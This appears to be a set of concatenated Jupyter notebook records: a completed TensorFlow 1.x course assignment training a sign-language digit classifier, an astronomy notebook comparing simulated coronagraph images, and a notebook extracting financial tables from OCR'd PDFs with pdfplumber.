Create the session (approx. 1 line)\n sess = tf.Session()\n \n # Run the session to compute 'ones' (approx. 1 line)\n ones = sess.run(ones)\n \n # Close the session (approx. 1 line). See method 1 above.\n sess.close()\n \n return ones", "_____no_output_____" ], [ "print (\"ones = \" + str(ones([3])))", "ones = [ 1. 1. 1.]\n" ] ], [ [ "**Expected Output:**\n\n<table> \n <tr> \n <td>\n **ones**\n </td>\n <td>\n [ 1. 1. 
1.]\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "# 2 - Building your first neural network in tensorflow\n\nIn this part of the assignment you will build a neural network using tensorflow. Remember that there are two parts to implement a tensorflow model:\n\n- Create the computation graph\n- Run the graph\n\nLet's delve into the problem you'd like to solve!\n\n### 2.0 - Problem statement: SIGNS Dataset\n\nOne afternoon, with some friends we decided to teach our computers to decipher sign language. We spent a few hours taking pictures in front of a white wall and came up with the following dataset. It's now your job to build an algorithm that would facilitate communications from a speech-impaired person to someone who doesn't understand sign language.\n\n- **Training set**: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).\n- **Test set**: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).\n\nNote that this is a subset of the SIGNS dataset. The complete dataset contains many more signs.\n\nHere are examples for each number, and how an explanation of how we represent the labels. 
These are the original pictures, before we lowered the image resolutoion to 64 by 64 pixels.\n<img src=\"images/hands.png\" style=\"width:800px;height:350px;\"><caption><center> <u><font color='purple'> **Figure 1**</u><font color='purple'>: SIGNS dataset <br> <font color='black'> </center>\n\n\nRun the following code to load the dataset.", "_____no_output_____" ] ], [ [ "# Loading the dataset\nX_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()", "_____no_output_____" ] ], [ [ "Change the index below and run the cell to visualize some examples in the dataset.", "_____no_output_____" ] ], [ [ "# Example of a picture\nindex = 0\nplt.imshow(X_train_orig[index])\nprint (\"y = \" + str(np.squeeze(Y_train_orig[:, index])))", "y = 5\n" ] ], [ [ "As usual you flatten the image dataset, then normalize it by dividing by 255. On top of that, you will convert each label to a one-hot vector as shown in Figure 1. Run the cell below to do so.", "_____no_output_____" ] ], [ [ "# Flatten the training and test images\nX_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T\nX_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T\n# Normalize image vectors\nX_train = X_train_flatten/255.\nX_test = X_test_flatten/255.\n# Convert training and test labels to one hot matrices\nY_train = convert_to_one_hot(Y_train_orig, 6)\nY_test = convert_to_one_hot(Y_test_orig, 6)\n\nprint (\"number of training examples = \" + str(X_train.shape[1]))\nprint (\"number of test examples = \" + str(X_test.shape[1]))\nprint (\"X_train shape: \" + str(X_train.shape))\nprint (\"Y_train shape: \" + str(Y_train.shape))\nprint (\"X_test shape: \" + str(X_test.shape))\nprint (\"Y_test shape: \" + str(Y_test.shape))", "number of training examples = 1080\nnumber of test examples = 120\nX_train shape: (12288, 1080)\nY_train shape: (6, 1080)\nX_test shape: (12288, 120)\nY_test shape: (6, 120)\n" ] ], [ [ "**Note** that 12288 comes from $64 \\times 64 \\times 3$. 
Each image is square, 64 by 64 pixels, and 3 is for the RGB colors. Please make sure all these shapes make sense to you before continuing.", "_____no_output_____" ], [ "**Your goal** is to build an algorithm capable of recognizing a sign with high accuracy. To do so, you are going to build a tensorflow model that is almost the same as one you have previously built in numpy for cat recognition (but now using a softmax output). It is a great occasion to compare your numpy implementation to the tensorflow one. \n\n**The model** is *LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX*. The SIGMOID output layer has been converted to a SOFTMAX. A SOFTMAX layer generalizes SIGMOID to when there are more than two classes. ", "_____no_output_____" ], [ "### 2.1 - Create placeholders\n\nYour first task is to create placeholders for `X` and `Y`. This will allow you to later pass your training data in when you run your session. \n\n**Exercise:** Implement the function below to create the placeholders in tensorflow.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: create_placeholders\n\ndef create_placeholders(n_x, n_y):\n \"\"\"\n Creates the placeholders for the tensorflow session.\n \n Arguments:\n n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)\n n_y -- scalar, number of classes (from 0 to 5, so -> 6)\n \n Returns:\n X -- placeholder for the data input, of shape [n_x, None] and dtype \"tf.float32\"\n Y -- placeholder for the input labels, of shape [n_y, None] and dtype \"tf.float32\"\n \n Tips:\n - You will use None because it let's us be flexible on the number of examples you will for the placeholders.\n In fact, the number of examples during test/train is different.\n \"\"\"\n\n X = tf.placeholder(tf.float32, shape=[n_x, None], name='X')\n Y = tf.placeholder(tf.float32, shape=[n_y, None], name='Y')\n \n return X, Y", "_____no_output_____" ], [ "X, Y = create_placeholders(12288, 6)\nprint (\"X = \" + str(X))\nprint (\"Y = \" + str(Y))", 
"X = Tensor(\"X_1:0\", shape=(12288, ?), dtype=float32)\nY = Tensor(\"Y_1:0\", shape=(6, ?), dtype=float32)\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **X**\n </td>\n <td>\n Tensor(\"Placeholder_1:0\", shape=(12288, ?), dtype=float32) (not necessarily Placeholder_1)\n </td>\n </tr>\n <tr> \n <td>\n **Y**\n </td>\n <td>\n Tensor(\"Placeholder_2:0\", shape=(6, ?), dtype=float32) (not necessarily Placeholder_2)\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "### 2.2 - Initializing the parameters\n\nYour second task is to initialize the parameters in tensorflow.\n\n**Exercise:** Implement the function below to initialize the parameters in tensorflow. You are going use Xavier Initialization for weights and Zero Initialization for biases. The shapes are given below. As an example, to help you, for W1 and b1 you could use: \n\n```python\nW1 = tf.get_variable(\"W1\", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\nb1 = tf.get_variable(\"b1\", [25,1], initializer = tf.zeros_initializer())\n```\nPlease use `seed = 1` to make sure your results match ours.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: initialize_parameters\n\ndef initialize_parameters():\n \"\"\"\n Initializes parameters to build a neural network with tensorflow. 
The shapes are:\n W1 : [25, 12288]\n b1 : [25, 1]\n W2 : [12, 25]\n b2 : [12, 1]\n W3 : [6, 12]\n b3 : [6, 1]\n \n Returns:\n parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3\n \"\"\"\n \n tf.set_random_seed(1) # so that your \"random\" numbers match ours\n \n W1 = tf.get_variable(\"W1\", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\n b1 = tf.get_variable(\"b1\", [25, 1], initializer = tf.zeros_initializer())\n W2 = tf.get_variable(\"W2\", [12,25], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\n b2 = tf.get_variable(\"b2\", [12, 1], initializer = tf.zeros_initializer())\n W3 = tf.get_variable(\"W3\", [6, 12], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\n b3 = tf.get_variable(\"b3\", [6, 1], initializer = tf.zeros_initializer())\n\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2,\n \"W3\": W3,\n \"b3\": b3}\n \n return parameters", "_____no_output_____" ], [ "tf.reset_default_graph()\nwith tf.Session() as sess:\n parameters = initialize_parameters()\n print(\"W1 = \" + str(parameters[\"W1\"]))\n print(\"b1 = \" + str(parameters[\"b1\"]))\n print(\"W2 = \" + str(parameters[\"W2\"]))\n print(\"b2 = \" + str(parameters[\"b2\"]))", "W1 = <tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref>\nb1 = <tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref>\nW2 = <tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref>\nb2 = <tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref>\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **W1**\n </td>\n <td>\n < tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref >\n </td>\n </tr>\n <tr> \n <td>\n **b1**\n </td>\n <td>\n < tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref >\n </td>\n </tr>\n <tr> \n <td>\n **W2**\n </td>\n <td>\n < tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref >\n </td>\n </tr>\n <tr> \n <td>\n **b2**\n </td>\n <td>\n < tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref >\n </td>\n 
</tr>\n\n</table>", "_____no_output_____" ], [ "As expected, the parameters haven't been evaluated yet.", "_____no_output_____" ], [ "### 2.3 - Forward propagation in tensorflow \n\nYou will now implement the forward propagation module in tensorflow. The function will take in a dictionary of parameters and it will complete the forward pass. The functions you will be using are: \n\n- `tf.add(...,...)` to do an addition\n- `tf.matmul(...,...)` to do a matrix multiplication\n- `tf.nn.relu(...)` to apply the ReLU activation\n\n**Question:** Implement the forward pass of the neural network. We commented for you the numpy equivalents so that you can compare the tensorflow implementation to numpy. It is important to note that the forward propagation stops at `z3`. The reason is that in tensorflow the last linear layer output is given as input to the function computing the loss. Therefore, you don't need `a3`!\n\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: forward_propagation\n\ndef forward_propagation(X, parameters):\n \"\"\"\n Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX\n \n Arguments:\n X -- input dataset placeholder, of shape (input size, number of examples)\n parameters -- python dictionary containing your parameters \"W1\", \"b1\", \"W2\", \"b2\", \"W3\", \"b3\"\n the shapes are given in initialize_parameters\n\n Returns:\n Z3 -- the output of the last LINEAR unit\n \"\"\"\n \n # Retrieve the parameters from the dictionary \"parameters\" \n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n # Numpy Equivalents:\n Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1\n A1 = tf.nn.relu(Z1) # A1 = relu(Z1)\n Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, A1) + b2\n A2 = tf.nn.relu(Z2) # A2 = relu(Z2)\n Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3, A2) + b3\n \n return Z3", 
"_____no_output_____" ], [ "tf.reset_default_graph()\n\nwith tf.Session() as sess:\n X, Y = create_placeholders(12288, 6)\n parameters = initialize_parameters()\n Z3 = forward_propagation(X, parameters)\n print(\"Z3 = \" + str(Z3))", "Z3 = Tensor(\"Add_2:0\", shape=(6, ?), dtype=float32)\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **Z3**\n </td>\n <td>\n Tensor(\"Add_2:0\", shape=(6, ?), dtype=float32)\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "You may have noticed that the forward propagation doesn't output any cache. You will understand why below, when we get to brackpropagation.", "_____no_output_____" ], [ "### 2.4 Compute cost\n\nAs seen before, it is very easy to compute the cost using:\n```python\ntf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = ..., labels = ...))\n```\n**Question**: Implement the cost function below. \n- It is important to know that the \"`logits`\" and \"`labels`\" inputs of `tf.nn.softmax_cross_entropy_with_logits` are expected to be of shape (number of examples, num_classes). 
We have thus transposed Z3 and Y for you.\n- Besides, `tf.reduce_mean` basically does the summation over the examples.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: compute_cost \n\ndef compute_cost(Z3, Y):\n \"\"\"\n Computes the cost\n \n Arguments:\n Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples)\n Y -- \"true\" labels vector placeholder, same shape as Z3\n \n Returns:\n cost - Tensor of the cost function\n \"\"\"\n \n # to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...)\n logits = tf.transpose(Z3)\n labels = tf.transpose(Y)\n\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))\n \n return cost", "_____no_output_____" ], [ "tf.reset_default_graph()\n\nwith tf.Session() as sess:\n X, Y = create_placeholders(12288, 6)\n parameters = initialize_parameters()\n Z3 = forward_propagation(X, parameters)\n cost = compute_cost(Z3, Y)\n print(\"cost = \" + str(cost))", "cost = Tensor(\"Mean:0\", shape=(), dtype=float32)\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **cost**\n </td>\n <td>\n Tensor(\"Mean:0\", shape=(), dtype=float32)\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "### 2.5 - Backward propagation & parameter updates\n\nThis is where you become grateful to programming frameworks. All the backpropagation and the parameters update is taken care of in 1 line of code. It is very easy to incorporate this line in the model.\n\nAfter you compute the cost function. You will create an \"`optimizer`\" object. You have to call this object along with the cost when running the tf.session. 
When called, it will perform an optimization on the given cost with the chosen method and learning rate.\n\nFor instance, for gradient descent the optimizer would be:\n```python\noptimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(cost)\n```\n\nTo make the optimization you would do:\n```python\n_ , c = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})\n```\n\nThis computes the backpropagation by passing through the tensorflow graph in the reverse order. From cost to inputs.\n\n**Note** When coding, we often use `_` as a \"throwaway\" variable to store values that we won't need to use later. Here, `_` takes on the evaluated value of `optimizer`, which we don't need (and `c` takes the value of the `cost` variable). ", "_____no_output_____" ], [ "### 2.6 - Building the model\n\nNow, you will bring it all together! \n\n**Exercise:** Implement the model. You will be calling the functions you had previously implemented.", "_____no_output_____" ] ], [ [ "def model(X_train, Y_train, X_test, Y_test, learning_rate = 0.0001,\n num_epochs = 1500, minibatch_size = 32, print_cost = True):\n \"\"\"\n Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.\n \n Arguments:\n X_train -- training set, of shape (input size = 12288, number of training examples = 1080)\n Y_train -- test set, of shape (output size = 6, number of training examples = 1080)\n X_test -- training set, of shape (input size = 12288, number of training examples = 120)\n Y_test -- test set, of shape (output size = 6, number of test examples = 120)\n learning_rate -- learning rate of the optimization\n num_epochs -- number of epochs of the optimization loop\n minibatch_size -- size of a minibatch\n print_cost -- True to print the cost every 100 epochs\n \n Returns:\n parameters -- parameters learnt by the model. 
They can then be used to predict.\n \"\"\"\n \n ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables\n tf.set_random_seed(1) # to keep consistent results\n seed = 3 # to keep consistent results\n (n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)\n n_y = Y_train.shape[0] # n_y : output size\n costs = [] # To keep track of the cost\n \n # Create Placeholders of shape (n_x, n_y)\n X, Y = create_placeholders(n_x, n_y)\n\n # Initialize parameters\n parameters = initialize_parameters()\n \n # Forward propagation: Build the forward propagation in the tensorflow graph\n Z3 = forward_propagation(X, parameters)\n \n # Cost function: Add cost function to tensorflow graph\n cost = compute_cost(Z3, Y)\n \n # Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(cost)\n \n # Initialize all the variables\n init = tf.global_variables_initializer()\n\n # Start the session to compute the tensorflow graph\n with tf.Session() as sess:\n \n # Run the initialization\n sess.run(init)\n \n # Do the training loop\n for epoch in range(num_epochs):\n\n epoch_cost = 0. 
# Defines a cost related to an epoch\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n seed = seed + 1\n minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed)\n\n for minibatch in minibatches:\n\n # Select a minibatch\n (minibatch_X, minibatch_Y) = minibatch\n \n # IMPORTANT: The line that runs the graph on a minibatch.\n # Run the session to execute the \"optimizer\" and the \"cost\", the feedict should contain a minibatch for (X,Y).\n _ , minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})\n \n epoch_cost += minibatch_cost / minibatch_size\n\n # Print the cost every epoch\n if print_cost == True and epoch % 100 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, epoch_cost))\n if print_cost == True and epoch % 5 == 0:\n costs.append(epoch_cost)\n \n # plot the cost\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per fives)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n # lets save the parameters in a variable\n parameters = sess.run(parameters)\n print (\"Parameters have been trained!\")\n\n # Calculate the correct predictions\n correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y))\n\n # Calculate accuracy on the test set\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n print (\"Train Accuracy:\", accuracy.eval({X: X_train, Y: Y_train}))\n print (\"Test Accuracy:\", accuracy.eval({X: X_test, Y: Y_test}))\n \n return parameters", "_____no_output_____" ] ], [ [ "Run the following cell to train your model! On our machine it takes about 5 minutes. Your \"Cost after epoch 100\" should be 1.048222. If it's not, don't waste time; interrupt the training by clicking on the square (⬛) in the upper bar of the notebook, and try to correct your code. 
If it is the correct cost, take a break and come back in 5 minutes!", "_____no_output_____" ] ], [ [ "parameters = model(X_train, Y_train, X_test, Y_test)", "Cost after epoch 0: 1.913693\nCost after epoch 100: 1.048222\nCost after epoch 200: 0.756012\nCost after epoch 300: 0.590844\nCost after epoch 400: 0.483423\nCost after epoch 500: 0.392928\nCost after epoch 600: 0.323629\nCost after epoch 700: 0.262100\nCost after epoch 800: 0.210199\nCost after epoch 900: 0.171622\nCost after epoch 1000: 0.145907\nCost after epoch 1100: 0.110942\nCost after epoch 1200: 0.088966\nCost after epoch 1300: 0.061226\nCost after epoch 1400: 0.053860\n" ] ], [ [ "**Expected Output**:\n\n<table> \n <tr> \n <td>\n **Train Accuracy**\n </td>\n <td>\n 0.999074\n </td>\n </tr>\n <tr> \n <td>\n **Test Accuracy**\n </td>\n <td>\n 0.716667\n </td>\n </tr>\n\n</table>\n\nAmazing, your algorithm can recognize a sign representing a figure between 0 and 5 with 71.7% accuracy.\n\n**Insights**:\n- Your model seems big enough to fit the training set well. However, given the difference between train and test accuracy, you could try to add L2 or dropout regularization to reduce overfitting. \n- Think about the session as a block of code to train the model. Each time you run the session on a minibatch, it trains the parameters. In total you have run the session a large number of times (1500 epochs) until you obtained well trained parameters.", "_____no_output_____" ], [ "### 2.7 - Test with your own image (optional / ungraded exercise)\n\nCongratulations on finishing this assignment. You can now take a picture of your hand and see the output of your model. To do that:\n 1. Click on \"File\" in the upper bar of this notebook, then click \"Open\" to go on your Coursera Hub.\n 2. Add your image to this Jupyter Notebook's directory, in the \"images\" folder\n 3. Write your image's name in the following code\n 4. 
Run the code and check if the algorithm is right!", "_____no_output_____" ] ], [ [ "import scipy\nfrom PIL import Image\nfrom scipy import ndimage\n\n## START CODE HERE ## (PUT YOUR IMAGE NAME) \nmy_image = \"thumbs_up.jpg\"\n## END CODE HERE ##\n\n# We preprocess your image to fit your algorithm.\nfname = \"images/\" + my_image\nimage = np.array(ndimage.imread(fname, flatten=False))\nimage = image/255.\nmy_image = scipy.misc.imresize(image, size=(64,64)).reshape((1, 64*64*3)).T\nmy_image_prediction = predict(my_image, parameters)\n\nplt.imshow(image)\nprint(\"Your algorithm predicts: y = \" + str(np.squeeze(my_image_prediction)))", "_____no_output_____" ] ], [ [ "You indeed deserved a \"thumbs-up\" although as you can see the algorithm seems to classify it incorrectly. The reason is that the training set doesn't contain any \"thumbs-up\", so the model doesn't know how to deal with it! We call that a \"mismatched data distribution\" and it is one of the various of the next course on \"Structuring Machine Learning Projects\".", "_____no_output_____" ], [ "<font color='blue'>\n**What you should remember**:\n- Tensorflow is a programming framework used in deep learning\n- The two main object classes in tensorflow are Tensors and Operators. \n- When you code in tensorflow you have to take the following steps:\n - Create a graph containing Tensors (Variables, Placeholders ...) and Operations (tf.matmul, tf.add, ...)\n - Create a session\n - Initialize the session\n - Run the session to execute the graph\n- You can execute the graph multiple times as you've seen in model()\n- The backpropagation and optimization is automatically done when running the session on the \"optimizer\" object.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ] ]
e72d91a9014f76a2309303a24ad494b7e3cfc025
3,903
ipynb
Jupyter Notebook
Jupyter Notebooks/JWST and WebbPSF/8_Comparing calibrated analytical with E2E images.ipynb
ivalaginja/PASTIS
ed52a4c838c93cd933f7a8c0bf52113cddd5a415
[ "BSD-3-Clause" ]
null
null
null
Jupyter Notebooks/JWST and WebbPSF/8_Comparing calibrated analytical with E2E images.ipynb
ivalaginja/PASTIS
ed52a4c838c93cd933f7a8c0bf52113cddd5a415
[ "BSD-3-Clause" ]
null
null
null
Jupyter Notebooks/JWST and WebbPSF/8_Comparing calibrated analytical with E2E images.ipynb
ivalaginja/PASTIS
ed52a4c838c93cd933f7a8c0bf52113cddd5a415
[ "BSD-3-Clause" ]
null
null
null
30.023077
336
0.591084
[ [ [ "# Comparing calibrated analytical with E2E images\n\nIn the process of generating the analytical matrix with `matrix_building_analytical.py` the code produces *calibrated* pair-wise aberrated analytical images. The script `matrix_building_analytical.py` does the same thing but produces pair-wise aberrated E2E images. In this notebook, I am comparing the resulting images from both.", "_____no_output_____" ] ], [ [ "import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom astropy.io import fits\n%matplotlib inline\n\nos.chdir('../../pastis/')\nfrom config import CONFIG_INI\nimport util_pastis as util", "_____no_output_____" ], [ "# Reading parameters from configfile\nwhich_tel = CONFIG_INI.get('telescope', 'name')\nnb_seg = CONFIG_INI.getint(which_tel, 'nb_subapertures')\n\nnumdir = os.path.join(CONFIG_INI.get('local', 'local_data_path'), 'active', 'matrix_numerical')\nanadir = os.path.join(CONFIG_INI.get('local', 'local_data_path'), 'active', 'matrix_analytical')\n\nnumdir = '/Users/ilaginja/Documents/data_from_repos/pastis_data/2019-4-18_001_100nm/matrix_numerical'\nanadir = '/Users/ilaginja/Documents/data_from_repos/pastis_data/2019-4-18_001_100nm/matrix_analytical'\n\nprint(\"Reading E2E images from\", numdir)\nprint(\"Reading calibrated analytical images from\", anadir)", "_____no_output_____" ], [ "# Read the PSF cubes for both\nnum_cube = fits.getdata(os.path.join(numdir, \"darkholes\", \"dh_cube.fits\"))\nana_cube = fits.getdata(os.path.join(anadir, \"darkholes\", \"dh_cube.fits\"))\n\nprint(\"num_cube.shape:\", num_cube.shape)\nprint(\"ana_cube.shape:\", ana_cube.shape)", "_____no_output_____" ], [ "# Pick what segment aberration combo you want to look at\nseg1 = 3\nseg2 = 10\n\nif (seg1 not in range(1, nb_seg+1)) or (seg2 not in range(1, nb_seg+1)): # this could be simplified...\n print(\"Your setup only has {} segments\".format(nb_seg))\nelse:\n segind = (seg1-1) * nb_seg + (seg2-1)\n print('Segment 
pair: {} - {}'.format(seg1, seg2))\n print(\"segind:\", segind)", "_____no_output_____" ], [ "plt.figure(figsize=(18, 9))\nplt.suptitle('Segment pair: {} - {}'.format(seg1, seg2))\nplt.subplot(1, 2, 1)\nplt.imshow(util.zoom_cen(num_cube[segind], ana_cube.shape[2]/2), norm=LogNorm())\nplt.colorbar()\nplt.title('E2E DH')\nplt.subplot(1, 2, 2)\nplt.imshow(ana_cube[segind], norm=LogNorm())\nplt.colorbar()\nplt.title('Analytical DH')", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
e72d9291ad88ab860996d97dc29761e8aeeb4ed7
240,664
ipynb
Jupyter Notebook
2b-pdf-plumber.ipynb
drkane/pdf-accounts
14c8ca294e11519567fb78f0c899c4504a023ec5
[ "MIT" ]
1
2020-06-23T22:42:11.000Z
2020-06-23T22:42:11.000Z
2b-pdf-plumber.ipynb
drkane/pdf-accounts
14c8ca294e11519567fb78f0c899c4504a023ec5
[ "MIT" ]
null
null
null
2b-pdf-plumber.ipynb
drkane/pdf-accounts
14c8ca294e11519567fb78f0c899c4504a023ec5
[ "MIT" ]
null
null
null
93.899337
134,636
0.742413
[ [ [ "# Task 2b: Extracting data from OCR'd PDFs", "_____no_output_____" ], [ "Import the needed libraries. We'll be using the amazing [pdfplumber](https://github.com/jsvine/pdfplumber) to gather lines from the account PDF.", "_____no_output_____" ] ], [ [ "import pdfplumber\nimport pandas as pd\nfrom matplotlib.patches import Rectangle\nimport matplotlib.pyplot as plt\nfrom decimal import Decimal\nimport re\n\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Function for printing a diagram with the boundaries of the words on a page.", "_____no_output_____" ] ], [ [ "def print_words(p):\n fig = plt.figure(figsize=(4,6))\n ax = fig.add_axes([0,0,1,1]) \n _ = ax.set_xlim(left=0, right=int(p.width))\n _ = ax.set_ylim(top=0, bottom=int(p.height))\n for i in p.extract_words():\n r = Rectangle(\n # (left, bottom), width, height,\n (i['x0'], i['bottom']), (i['x1'] - i['x0']), (i['top'] - i['bottom']),\n color='blue'\n )\n r = ax.add_patch(r)", "_____no_output_____" ] ], [ [ "## Get a sample PDF\n\nThis is a PDF that has been OCR'ed using the process in task 2a. The `p` variable represents the page with the Balance Sheet on.", "_____no_output_____" ] ], [ [ "pdf = pdfplumber.open(\"test_accounts.pdf\")\np = pdf.pages[19]", "_____no_output_____" ] ], [ [ "Here's a representation of what the page looks like.", "_____no_output_____" ] ], [ [ "print_words(p)", "_____no_output_____" ] ], [ [ "## Approach 1: Use inbuilt `extract_table` function\n\nThis approach does find a table, but it's not great for getting at the data within.", "_____no_output_____" ] ], [ [ "pd.DataFrame(p.extract_table({\n \"horizontal_strategy\": \"text\",\n \"vertical_strategy\": \"text\",\n \"snap_tolerance\": 6,\n \"join_tolerance\": 2,\n}))", "_____no_output_____" ] ], [ [ "## Approach 2: Detecting lines\n\nThis function should output a series of recetangles giving separated lines in a PDF page. 
It's based on finding gaps between lines, so relies on there being vertical white space.", "_____no_output_____" ] ], [ [ "def detect_lines(p, x_tolerance=0):\n \"\"\"\n Detect lines in a PDF page\n \"\"\"\n cells = pd.DataFrame(p.extract_words(x_tolerance=x_tolerance)).sort_values([\"top\", \"x0\"])\n row_ranges = []\n this_range = []\n for i in range(0, int(p.height)):\n result = ((cells['bottom'] >= i) & (cells['top'] <= i)).sum()>0\n if result:\n this_range.append(i)\n else:\n if this_range:\n row_ranges.append(this_range)\n this_range = []\n # create bounding boxes: (x0, top, x1, bottom)\n return [{\n \"x0\": 0,\n \"top\": min(r),\n \"x1\": p.width,\n \"bottom\": max(r)\n } for r in row_ranges]", "_____no_output_____" ] ], [ [ "Draw a picture of the page with the lines highlighted.", "_____no_output_____" ] ], [ [ "im = p.to_image()\nim.draw_rects(detect_lines(p, 0))", "_____no_output_____" ] ], [ [ "## Approach 3: Use the `extract_text` function to get lines\n\nOnce the lines have been found, use a regex to find the data.", "_____no_output_____" ] ], [ [ "p.extract_text(y_tolerance=30).split('\\n')", "_____no_output_____" ], [ "def get_finances(pdf):\n \n finance_regex = r'(.*)\\s+(\\(?\\-?[\\,0-9]+\\)?)\\s+(\\(?\\-?[\\,0-9]+\\)?)$'\n \n def process_match(match):\n match = {\n \"text\": match[0],\n \"value1\": match[1],\n \"value2\": match[2]\n }\n for i in (\"value1\", \"value2\"):\n match[i] = match[i].replace(\",\", \"\")\n if match[i][0] == \"(\" and match[i][-1] == \")\":\n match[i] = match[i].replace(\"(\", \"-\").replace(\")\", \"\")\n match[i] = float(match[i])\n return match\n \n finances = []\n for ps in pdf.pages:\n for l in ps.extract_text(y_tolerance=20).split('\\n'):\n match = re.search(finance_regex, l)\n if match:\n m = process_match(match.groups())\n m['page'] = ps.page_number\n finances.append(m)\n \n return pd.DataFrame(finances)", "_____no_output_____" ], [ "get_finances(pdf)", "_____no_output_____" ] ], [ [ "## Test on a random sample of 
